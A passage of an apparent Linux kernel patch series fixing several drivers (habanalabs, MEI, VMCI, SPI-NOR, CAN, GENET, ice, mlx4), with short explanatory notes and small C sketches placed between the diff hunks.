+-	requested_offset_record->ts_reg_info.cq_cb = cq_cb;
+-	requested_offset_record->ts_reg_info.timestamp_kernel_addr =
+-			(u64 *) ts_buff->user_buff_address + ts_offset;
+-	requested_offset_record->cq_kernel_addr =
+-			(u64 *) cq_cb->kernel_address + cq_offset;
+-	requested_offset_record->cq_target_value = target_value;
+-
+ 	*pend = requested_offset_record;
+ 
+ 	dev_dbg(buf->mmg->dev, "Found available node in TS kernel CB %p\n",
+@@ -3151,7 +3150,7 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 			goto put_cq_cb;
+ 		}
+ 
+-		/* Find first available record */
++		/* get ts buffer record */
+ 		rc = ts_buff_get_kernel_ts_record(buf, cq_cb, ts_offset,
+ 						cq_counters_offset, target_value,
+ 						&interrupt->wait_list_lock, &pend);
+@@ -3199,7 +3198,19 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 	 * Note that we cannot have sorted list by target value,
+ 	 * in order to shorten the list pass loop, since
+ 	 * same list could have nodes for different cq counter handle.
++	 * Note:
++	 * Mark the ts buff offset as in-use here, inside the spinlock-protected
++	 * section, to avoid taking the re-use path in ts_buff_get_kernel_ts_record
++	 * before the node is added to the list. That scenario can happen when
++	 * multiple threads race on the same offset: one thread sets up the ts
++	 * buff in ts_buff_get_kernel_ts_record, another thread then reaches
++	 * ts_buff_get_kernel_ts_record as well, re-uses the same ts buff offset,
++	 * and ends up trying to delete a node that does not exist on the list.
+ 	 */
++	if (register_ts_record)
++		pend->ts_reg_info.in_use = 1;
++
+ 	list_add_tail(&pend->wait_list_node, &interrupt->wait_list_head);
+ 	spin_unlock_irqrestore(&interrupt->wait_list_lock, flags);
+ 
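The reordering in the first habanalabs hunk moves the field initialization inside the spinlock-protected section, so a concurrent thread scanning the wait list can never observe a half-filled record. A minimal pthreads sketch of the publish-under-lock pattern (the structure is illustrative, not the driver's types):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

struct node {
	int ready;	/* stands in for the ts_reg_info fields */
	int value;
};

static struct node shared;

static void publish(int value)
{
	pthread_mutex_lock(&lock);
	/* Fill in every field *before* unlocking: once the lock is
	 * released, other threads may legitimately look at the node. */
	shared.value = value;
	shared.ready = 1;
	pthread_mutex_unlock(&lock);
}

int main(void)
{
	publish(42);
	printf("%d %d\n", shared.ready, shared.value);
	return 0;
}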
+diff --git a/drivers/misc/habanalabs/common/device.c b/drivers/misc/habanalabs/common/device.c
+index 233d8b46c831f..e0dca445abf14 100644
+--- a/drivers/misc/habanalabs/common/device.c
++++ b/drivers/misc/habanalabs/common/device.c
+@@ -1458,7 +1458,8 @@ kill_processes:
+ 		if (rc == -EBUSY) {
+ 			if (hdev->device_fini_pending) {
+ 				dev_crit(hdev->dev,
+-					"Failed to kill all open processes, stopping hard reset\n");
++					"%s Failed to kill all open processes, stopping hard reset\n",
++					dev_name(&(hdev)->pdev->dev));
+ 				goto out_err;
+ 			}
+ 
+@@ -1468,7 +1469,8 @@ kill_processes:
+ 
+ 		if (rc) {
+ 			dev_crit(hdev->dev,
+-				"Failed to kill all open processes, stopping hard reset\n");
++				"%s Failed to kill all open processes, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			goto out_err;
+ 		}
+ 
+@@ -1519,14 +1521,16 @@ kill_processes:
+ 			 * ensure driver puts the driver in a unusable state
+ 			 */
+ 			dev_crit(hdev->dev,
+-				"Consecutive FW fatal errors received, stopping hard reset\n");
++				"%s Consecutive FW fatal errors received, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EIO;
+ 			goto out_err;
+ 		}
+ 
+ 		if (hdev->kernel_ctx) {
+ 			dev_crit(hdev->dev,
+-				"kernel ctx was alive during hard reset, something is terribly wrong\n");
++				"%s kernel ctx was alive during hard reset, something is terribly wrong\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EBUSY;
+ 			goto out_err;
+ 		}
+@@ -1645,9 +1649,13 @@ kill_processes:
+ 	hdev->reset_info.needs_reset = false;
+ 
+ 	if (hard_reset)
+-		dev_info(hdev->dev, "Successfully finished resetting the device\n");
++		dev_info(hdev->dev,
++			 "Successfully finished resetting the %s device\n",
++			 dev_name(&(hdev)->pdev->dev));
+ 	else
+-		dev_dbg(hdev->dev, "Successfully finished resetting the device\n");
++		dev_dbg(hdev->dev,
++			"Successfully finished resetting the %s device\n",
++			dev_name(&(hdev)->pdev->dev));
+ 
+ 	if (hard_reset) {
+ 		hdev->reset_info.hard_reset_cnt++;
+@@ -1681,7 +1689,9 @@ out_err:
+ 	hdev->reset_info.in_compute_reset = 0;
+ 
+ 	if (hard_reset) {
+-		dev_err(hdev->dev, "Failed to reset! Device is NOT usable\n");
++		dev_err(hdev->dev,
++			"%s Failed to reset! Device is NOT usable\n",
++			dev_name(&(hdev)->pdev->dev));
+ 		hdev->reset_info.hard_reset_cnt++;
+ 	} else if (reset_upon_device_release) {
+ 		spin_unlock(&hdev->reset_info.lock);
+@@ -2004,7 +2014,8 @@ int hl_device_init(struct hl_device *hdev, struct class *hclass)
+ 	}
+ 
+ 	dev_notice(hdev->dev,
+-		"Successfully added device to habanalabs driver\n");
++		"Successfully added device %s to habanalabs driver\n",
++		dev_name(&(hdev)->pdev->dev));
+ 
+ 	hdev->init_done = true;
+ 
+@@ -2053,11 +2064,11 @@ out_disabled:
+ 		device_cdev_sysfs_add(hdev);
+ 	if (hdev->pdev)
+ 		dev_err(&hdev->pdev->dev,
+-			"Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++			"Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 	else
+-		pr_err("Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++		pr_err("Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 
+ 	return rc;
+ }
+@@ -2113,7 +2124,8 @@ void hl_device_fini(struct hl_device *hdev)
+ 
+ 		if (ktime_compare(ktime_get(), timeout) > 0) {
+ 			dev_crit(hdev->dev,
+-				"Failed to remove device because reset function did not finish\n");
++				"%s Failed to remove device because reset function did not finish\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/misc/habanalabs/common/memory.c b/drivers/misc/habanalabs/common/memory.c
+index ef28f3b37b932..a49038da3f6d0 100644
+--- a/drivers/misc/habanalabs/common/memory.c
++++ b/drivers/misc/habanalabs/common/memory.c
+@@ -2089,12 +2089,13 @@ static int hl_ts_mmap(struct hl_mmap_mem_buf *buf, struct vm_area_struct *vma, v
+ static int hl_ts_alloc_buf(struct hl_mmap_mem_buf *buf, gfp_t gfp, void *args)
+ {
+ 	struct hl_ts_buff *ts_buff = NULL;
+-	u32 size, num_elements;
++	u32 num_elements;
++	size_t size;
+ 	void *p;
+ 
+ 	num_elements = *(u32 *)args;
+ 
+-	ts_buff = kzalloc(sizeof(*ts_buff), GFP_KERNEL);
++	ts_buff = kzalloc(sizeof(*ts_buff), gfp);
+ 	if (!ts_buff)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/misc/mei/hdcp/mei_hdcp.c b/drivers/misc/mei/hdcp/mei_hdcp.c
+index e889a8bd7ac88..e0dcd5c114db1 100644
+--- a/drivers/misc/mei/hdcp/mei_hdcp.c
++++ b/drivers/misc/mei/hdcp/mei_hdcp.c
+@@ -859,8 +859,8 @@ static void mei_hdcp_remove(struct mei_cl_device *cldev)
+ 		dev_warn(&cldev->dev, "mei_cldev_disable() failed\n");
+ }
+ 
+-#define MEI_UUID_HDCP GUID_INIT(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
+-				0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
++#define MEI_UUID_HDCP UUID_LE(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
++			      0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
+ 
+ static const struct mei_cl_device_id mei_hdcp_tbl[] = {
+ 	{ .uuid = MEI_UUID_HDCP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/mei/pxp/mei_pxp.c b/drivers/misc/mei/pxp/mei_pxp.c
+index 5c39457e3f53d..412b2d91d9459 100644
+--- a/drivers/misc/mei/pxp/mei_pxp.c
++++ b/drivers/misc/mei/pxp/mei_pxp.c
+@@ -206,8 +206,8 @@ static void mei_pxp_remove(struct mei_cl_device *cldev)
+ }
+ 
+ /* fbf6fcf1-96cf-4e2e-a6a6-1bab8cbe36b1 : PAVP GUID*/
+-#define MEI_GUID_PXP GUID_INIT(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
+-			       0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
++#define MEI_GUID_PXP UUID_LE(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
++			     0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
+ 
+ static struct mei_cl_device_id mei_pxp_tbl[] = {
+ 	{ .uuid = MEI_GUID_PXP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index da1e2a773823e..857b9851402a6 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -242,6 +242,8 @@ static int vmci_host_setup_notify(struct vmci_ctx *context,
+ 		context->notify_page = NULL;
+ 		return VMCI_ERROR_GENERIC;
+ 	}
++	if (context->notify_page == NULL)
++		return VMCI_ERROR_UNAVAILABLE;
+ 
+ 	/*
+ 	 * Map the locked page and set up notify pointer.
+diff --git a/drivers/mtd/mtdpart.c b/drivers/mtd/mtdpart.c
+index d442fa94c8720..85f5ee6f06fc6 100644
+--- a/drivers/mtd/mtdpart.c
++++ b/drivers/mtd/mtdpart.c
+@@ -577,6 +577,7 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ {
+ 	struct mtd_part_parser *parser;
+ 	struct device_node *np;
++	struct device_node *child;
+ 	struct property *prop;
+ 	struct device *dev;
+ 	const char *compat;
+@@ -594,6 +595,15 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ 	else
+ 		np = of_get_child_by_name(np, "partitions");
+ 
++	/*
++	 * Don't create devices that are added to a bus but will never get
++	 * probed. Such devices would cause fw_devlink to block probing of
++	 * this partition's consumers until the partition device is probed.
++	 */
++	for_each_child_of_node(np, child)
++		if (of_device_is_compatible(child, "nvmem-cells"))
++			of_node_set_flag(child, OF_POPULATED);
++
+ 	of_property_for_each_string(np, "compatible", prop, compat) {
+ 		parser = mtd_part_get_compatible_parser(compat);
+ 		if (!parser)
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 5dbf52aa03551..cda57cb863089 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2003,6 +2003,15 @@ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 	erase->size_mask = (1 << erase->size_shift) - 1;
+ }
+ 
++/**
++ * spi_nor_mask_erase_type() - mask out a SPI NOR erase type
++ * @erase:	pointer to a structure that describes a SPI NOR erase type
++ */
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase)
++{
++	erase->size = 0;
++}
++
+ /**
+  * spi_nor_init_uniform_erase_map() - Initialize uniform erase map
+  * @map:		the erase map of the SPI NOR
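The new spi_nor_mask_erase_type() replaces open-coded spi_nor_set_erase_type(erase, 0, 0xFF) calls: an erase type with size == 0 is treated as absent by the erase-map code. A hedged sketch of how such masked entries are typically skipped (the consumer loop below is illustrative, not quoted from the driver):

#include <stdio.h>

struct erase_type {
	unsigned int size;	/* 0 means "masked out / not supported" */
	unsigned char opcode;
};

static void mask_erase_type(struct erase_type *e)
{
	e->size = 0;	/* size 0 is the "not present" sentinel */
}

int main(void)
{
	struct erase_type erase[4] = {
		{ 4096, 0x20 }, { 32768, 0x52 }, { 65536, 0xd8 }, { 0, 0 },
	};

	mask_erase_type(&erase[1]);	/* e.g. not listed for this region */

	for (int i = 0; i < 4; i++) {
		if (!erase[i].size)
			continue;	/* skip masked/absent erase types */
		printf("erase %d: %u bytes, opcode 0x%02x\n",
		       i, erase[i].size, erase[i].opcode);
	}
	return 0;
}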
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index 85b0cf254e974..d18dafeb020ab 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -682,6 +682,7 @@ void spi_nor_set_pp_settings(struct spi_nor_pp_command *pp, u8 opcode,
+ 
+ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 			    u8 opcode);
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase);
+ struct spi_nor_erase_region *
+ spi_nor_region_next(struct spi_nor_erase_region *region);
+ void spi_nor_init_uniform_erase_map(struct spi_nor_erase_map *map,
+diff --git a/drivers/mtd/spi-nor/sfdp.c b/drivers/mtd/spi-nor/sfdp.c
+index 2257f1b4c2e2d..78110387be0b5 100644
+--- a/drivers/mtd/spi-nor/sfdp.c
++++ b/drivers/mtd/spi-nor/sfdp.c
+@@ -876,7 +876,7 @@ static int spi_nor_init_non_uniform_erase_map(struct spi_nor *nor,
+ 	 */
+ 	for (i = 0; i < SNOR_ERASE_TYPE_MAX; i++)
+ 		if (!(regions_erase_type & BIT(erase[i].idx)))
+-			spi_nor_set_erase_type(&erase[i], 0, 0xFF);
++			spi_nor_mask_erase_type(&erase[i]);
+ 
+ 	return 0;
+ }
+@@ -1090,7 +1090,7 @@ static int spi_nor_parse_4bait(struct spi_nor *nor,
+ 			erase_type[i].opcode = (dwords[1] >>
+ 						erase_type[i].idx * 8) & 0xFF;
+ 		else
+-			spi_nor_set_erase_type(&erase_type[i], 0u, 0xFF);
++			spi_nor_mask_erase_type(&erase_type[i]);
+ 	}
+ 
+ 	/*
+@@ -1222,7 +1222,7 @@ static int spi_nor_parse_sccr(struct spi_nor *nor,
+ 
+ 	le32_to_cpu_array(dwords, sccr_header->length);
+ 
+-	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[22]))
++	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[21]))
+ 		nor->flags |= SNOR_F_IO_MODE_EN_VOLATILE;
+ 
+ out:
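The one-character sfdp.c fix is an off-by-one between the SFDP specification's 1-based DWORD numbering and the 0-based C array: the SCCR_DWORD22_* field lives in DWORD 22 of the table, which is dwords[21] after le32_to_cpu_array(). A small accessor makes the convention explicit (the macro name here is an assumption for illustration):

#include <stdio.h>
#include <stdint.h>

/* SFDP tables number DWORDs from 1; C arrays index from 0. */
#define SFDP_DWORD(n)	((n) - 1)

int main(void)
{
	uint32_t dwords[32] = { 0 };

	dwords[SFDP_DWORD(22)] = 1u << 31;	/* i.e. dwords[21] */

	printf("DWORD 22 = 0x%08x\n", dwords[SFDP_DWORD(22)]);
	return 0;
}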
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index 0150049007be1..7ac2ad1a8d576 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -21,8 +21,13 @@
+ #define SPINOR_REG_CYPRESS_CFR3V		0x00800004
+ #define SPINOR_REG_CYPRESS_CFR3V_PGSZ		BIT(4) /* Page size. */
+ #define SPINOR_REG_CYPRESS_CFR5V		0x00800006
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN	0x3
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	0
++#define SPINOR_REG_CYPRESS_CFR5_BIT6		BIT(6)
++#define SPINOR_REG_CYPRESS_CFR5_DDR		BIT(1)
++#define SPINOR_REG_CYPRESS_CFR5_OPI		BIT(0)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN				\
++	(SPINOR_REG_CYPRESS_CFR5_BIT6 |	SPINOR_REG_CYPRESS_CFR5_DDR |	\
++	 SPINOR_REG_CYPRESS_CFR5_OPI)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	SPINOR_REG_CYPRESS_CFR5_BIT6
+ #define SPINOR_OP_CYPRESS_RD_FAST		0xee
+ 
+ /* Cypress SPI NOR flash operations. */
+diff --git a/drivers/net/can/rcar/rcar_canfd.c b/drivers/net/can/rcar/rcar_canfd.c
+index b306cf554634f..e68291697c33f 100644
+--- a/drivers/net/can/rcar/rcar_canfd.c
++++ b/drivers/net/can/rcar/rcar_canfd.c
+@@ -98,10 +98,10 @@ enum rcanfd_chip_id {
+ /* RSCFDnCFDGAFLCFG0 / RSCFDnGAFLCFG0 */
+ #define RCANFD_GAFLCFG_SETRNC(gpriv, n, x) \
+ 	(((x) & reg_v3u(gpriv, 0x1ff, 0xff)) << \
+-	 (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8)))
++	 (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8)))
+ 
+ #define RCANFD_GAFLCFG_GETRNC(gpriv, n, x) \
+-	(((x) >> (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8))) & \
++	(((x) >> (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8))) & \
+ 	 reg_v3u(gpriv, 0x1ff, 0xff))
+ 
+ /* RSCFDnCFDGAFLECTR / RSCFDnGAFLECTR */
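Each RSCFDnGAFLCFG register packs the rule counts (RNC) for two channels, so the shift must depend only on whether the channel index is even or odd; using the raw index broke channels 2 and up. A sketch of the packing arithmetic for the classic (non-V3U) layout, where each field is 8 bits wide and a channel pair shares one 32-bit register (constants taken from the macro above):

#include <stdio.h>
#include <stdint.h>

/* Non-V3U layout: two 8-bit RNC fields per 32-bit register.
 * Channel n lives at shift 24 - (n & 1) * 8, i.e. the even channel of a
 * pair in bits 31:24 and the odd one in bits 23:16. */
static uint32_t rnc_set(unsigned int n, uint32_t x)
{
	return (x & 0xff) << (24 - (n & 1) * 8);
}

int main(void)
{
	/* Channels 2 and 3 share one register, just like channels 0 and 1. */
	for (unsigned int ch = 0; ch < 4; ch++)
		printf("ch%u -> 0x%08x\n", ch, rnc_set(ch, 0x12));
	return 0;
}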
+diff --git a/drivers/net/can/usb/esd_usb.c b/drivers/net/can/usb/esd_usb.c
+index 42323f5e6f3a0..578b25f873e58 100644
+--- a/drivers/net/can/usb/esd_usb.c
++++ b/drivers/net/can/usb/esd_usb.c
+@@ -239,41 +239,42 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			   msg->msg.rx.dlc, state, ecc, rxerr, txerr);
+ 
+ 		skb = alloc_can_err_skb(priv->netdev, &cf);
+-		if (skb == NULL) {
+-			stats->rx_dropped++;
+-			return;
+-		}
+ 
+ 		if (state != priv->old_state) {
++			enum can_state tx_state, rx_state;
++			enum can_state new_state = CAN_STATE_ERROR_ACTIVE;
++
+ 			priv->old_state = state;
+ 
+ 			switch (state & ESD_BUSSTATE_MASK) {
+ 			case ESD_BUSSTATE_BUSOFF:
+-				priv->can.state = CAN_STATE_BUS_OFF;
+-				cf->can_id |= CAN_ERR_BUSOFF;
+-				priv->can.can_stats.bus_off++;
++				new_state = CAN_STATE_BUS_OFF;
+ 				can_bus_off(priv->netdev);
+ 				break;
+ 			case ESD_BUSSTATE_WARN:
+-				priv->can.state = CAN_STATE_ERROR_WARNING;
+-				priv->can.can_stats.error_warning++;
++				new_state = CAN_STATE_ERROR_WARNING;
+ 				break;
+ 			case ESD_BUSSTATE_ERRPASSIVE:
+-				priv->can.state = CAN_STATE_ERROR_PASSIVE;
+-				priv->can.can_stats.error_passive++;
++				new_state = CAN_STATE_ERROR_PASSIVE;
+ 				break;
+ 			default:
+-				priv->can.state = CAN_STATE_ERROR_ACTIVE;
++				new_state = CAN_STATE_ERROR_ACTIVE;
+ 				txerr = 0;
+ 				rxerr = 0;
+ 				break;
+ 			}
+-		} else {
++
++			if (new_state != priv->can.state) {
++				tx_state = (txerr >= rxerr) ? new_state : 0;
++				rx_state = (txerr <= rxerr) ? new_state : 0;
++				can_change_state(priv->netdev, cf,
++						 tx_state, rx_state);
++			}
++		} else if (skb) {
+ 			priv->can.can_stats.bus_error++;
+ 			stats->rx_errors++;
+ 
+-			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR |
+-				      CAN_ERR_CNT;
++			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR;
+ 
+ 			switch (ecc & SJA1000_ECC_MASK) {
+ 			case SJA1000_ECC_BIT:
+@@ -286,7 +287,6 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 				cf->data[2] |= CAN_ERR_PROT_STUFF;
+ 				break;
+ 			default:
+-				cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 				break;
+ 			}
+ 
+@@ -294,20 +294,22 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			if (!(ecc & SJA1000_ECC_DIR))
+ 				cf->data[2] |= CAN_ERR_PROT_TX;
+ 
+-			if (priv->can.state == CAN_STATE_ERROR_WARNING ||
+-			    priv->can.state == CAN_STATE_ERROR_PASSIVE) {
+-				cf->data[1] = (txerr > rxerr) ?
+-					CAN_ERR_CRTL_TX_PASSIVE :
+-					CAN_ERR_CRTL_RX_PASSIVE;
+-			}
+-			cf->data[6] = txerr;
+-			cf->data[7] = rxerr;
++			/* Bit-stream position in the CAN frame where the error was detected */
++			cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 		}
+ 
+ 		priv->bec.txerr = txerr;
+ 		priv->bec.rxerr = rxerr;
+ 
+-		netif_rx(skb);
++		if (skb) {
++			cf->can_id |= CAN_ERR_CNT;
++			cf->data[6] = txerr;
++			cf->data[7] = rxerr;
++
++			netif_rx(skb);
++		} else {
++			stats->rx_dropped++;
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 25c4506069856..f679ed54b3ef2 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2311,6 +2311,14 @@ static unsigned int bcmgenet_desc_rx(struct bcmgenet_rx_ring *ring,
+ 			  __func__, p_index, ring->c_index,
+ 			  ring->read_ptr, dma_length_status);
+ 
++		if (unlikely(len > RX_BUF_LENGTH)) {
++			netif_err(priv, rx_status, dev, "oversized packet\n");
++			dev->stats.rx_length_errors++;
++			dev->stats.rx_errors++;
++			dev_kfree_skb_any(skb);
++			goto next;
++		}
++
+ 		if (unlikely(!(dma_flag & DMA_EOP) || !(dma_flag & DMA_SOP))) {
+ 			netif_err(priv, rx_status, dev,
+ 				  "dropping fragmented packet!\n");
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index 7ded559842e83..ded0e64a9f6a1 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -169,15 +169,6 @@ void bcmgenet_phy_power_set(struct net_device *dev, bool enable)
+ 
+ static void bcmgenet_moca_phy_setup(struct bcmgenet_priv *priv)
+ {
+-	u32 reg;
+-
+-	if (!GENET_IS_V5(priv)) {
+-		/* Speed settings are set in bcmgenet_mii_setup() */
+-		reg = bcmgenet_sys_readl(priv, SYS_PORT_CTRL);
+-		reg |= LED_ACT_SOURCE_MAC;
+-		bcmgenet_sys_writel(priv, reg, SYS_PORT_CTRL);
+-	}
+-
+ 	if (priv->hw_params->flags & GENET_HAS_MOCA_LINK_DET)
+ 		fixed_phy_set_link_update(priv->dev->phydev,
+ 					  bcmgenet_fixed_phy_link_update);
+@@ -210,6 +201,8 @@ int bcmgenet_mii_config(struct net_device *dev, bool init)
+ 
+ 		if (!phy_name) {
+ 			phy_name = "MoCA";
++			if (!GENET_IS_V5(priv))
++				port_ctrl |= LED_ACT_SOURCE_MAC;
+ 			bcmgenet_moca_phy_setup(priv);
+ 		}
+ 		break;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 72f97bb50b09c..3c6bb3f9ac780 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6159,15 +6159,12 @@ int ice_vsi_cfg(struct ice_vsi *vsi)
+ {
+ 	int err;
+ 
+-	if (vsi->netdev) {
++	if (vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_set_rx_mode(vsi->netdev);
+ 
+-		if (vsi->type != ICE_VSI_LB) {
+-			err = ice_vsi_vlan_setup(vsi);
+-
+-			if (err)
+-				return err;
+-		}
++		err = ice_vsi_vlan_setup(vsi);
++		if (err)
++			return err;
+ 	}
+ 	ice_vsi_cfg_dcb_rings(vsi);
+ 
+@@ -6348,7 +6345,7 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 
+ 	if (vsi->port_info &&
+ 	    (vsi->port_info->phy.link_info.link_info & ICE_AQ_LINK_UP) &&
+-	    vsi->netdev) {
++	    vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_print_link_msg(vsi, true);
+ 		netif_tx_start_all_queues(vsi->netdev);
+ 		netif_carrier_on(vsi->netdev);
+@@ -6360,7 +6357,9 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 	 * set the baseline so counters are ready when interface is up
+ 	 */
+ 	ice_update_eth_stats(vsi);
+-	ice_service_task_schedule(pf);
++
++	if (vsi->type == ICE_VSI_PF)
++		ice_service_task_schedule(pf);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index 53fec5bbe6e00..a3585ede829bb 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -2293,7 +2293,7 @@ static void ice_ptp_set_caps(struct ice_pf *pf)
+ 	snprintf(info->name, sizeof(info->name) - 1, "%s-%s-clk",
+ 		 dev_driver_string(dev), dev_name(dev));
+ 	info->owner = THIS_MODULE;
+-	info->max_adj = 999999999;
++	info->max_adj = 100000000;
+ 	info->adjtime = ice_ptp_adjtime;
+ 	info->adjfine = ice_ptp_adjfine;
+ 	info->gettimex64 = ice_ptp_gettimex64;
+diff --git a/drivers/net/ethernet/mellanox/mlx4/en_tx.c b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+index 43a4102e9c091..7fccf1a79f09b 100644
+--- a/drivers/net/ethernet/mellanox/mlx4/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+@@ -697,32 +697,32 @@ static void build_inline_wqe(struct mlx4_en_tx_desc *tx_desc,
+ 			inl->byte_count = cpu_to_be32(1 << 31 | skb->len);
+ 		} else {
+ 			inl->byte_count = cpu_to_be32(1 << 31 | MIN_PKT_LEN);
+-			memset(((void *)(inl + 1)) + skb->len, 0,
++			memset(inl->data + skb->len, 0,
+ 			       MIN_PKT_LEN - skb->len);
+ 		}
+-		skb_copy_from_linear_data(skb, inl + 1, hlen);
++		skb_copy_from_linear_data(skb, inl->data, hlen);
+ 		if (shinfo->nr_frags)
+-			memcpy(((void *)(inl + 1)) + hlen, fragptr,
++			memcpy(inl->data + hlen, fragptr,
+ 			       skb_frag_size(&shinfo->frags[0]));
+ 
+ 	} else {
+ 		inl->byte_count = cpu_to_be32(1 << 31 | spc);
+ 		if (hlen <= spc) {
+-			skb_copy_from_linear_data(skb, inl + 1, hlen);
++			skb_copy_from_linear_data(skb, inl->data, hlen);
+ 			if (hlen < spc) {
+-				memcpy(((void *)(inl + 1)) + hlen,
++				memcpy(inl->data + hlen,
+ 				       fragptr, spc - hlen);
+ 				fragptr +=  spc - hlen;
+ 			}
+-			inl = (void *) (inl + 1) + spc;
+-			memcpy(((void *)(inl + 1)), fragptr, skb->len - spc);
++			inl = (void *)inl->data + spc;
++			memcpy(inl->data, fragptr, skb->len - spc);
+ 		} else {
+-			skb_copy_from_linear_data(skb, inl + 1, spc);
+-			inl = (void *) (inl + 1) + spc;
+-			skb_copy_from_linear_data_offset(skb, spc, inl + 1,
++			skb_copy_from_linear_data(skb, inl->data, spc);
++			inl = (void *)inl->data + spc;
++			skb_copy_from_linear_data_offset(skb, spc, inl->data,
+ 							 hlen - spc);
+ 			if (shinfo->nr_frags)
+-				memcpy(((void *)(inl + 1)) + hlen - spc,
++				memcpy(inl->data + hlen - spc,
+ 				       fragptr,
+ 				       skb_frag_size(&shinfo->frags[0]));
+ 		}
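All the memcpy targets in the mlx4 hunk change from the pointer arithmetic (void *)(inl + 1) to inl->data. Both expressions address the first byte after the fixed header, but the flexible array member states the intent and is already a byte pointer. A sketch of the equivalence (the struct layout is illustrative):

#include <stdio.h>
#include <stdint.h>

struct inline_seg {
	uint32_t byte_count;
	uint8_t data[];		/* flexible array member: payload follows */
};

int main(void)
{
	uint8_t buf[64];
	struct inline_seg *inl = (struct inline_seg *)buf;

	/* The two expressions name the same address, but data[] carries
	 * the meaning and needs no void-pointer cast. */
	printf("inl + 1   = %p\n", (void *)(inl + 1));
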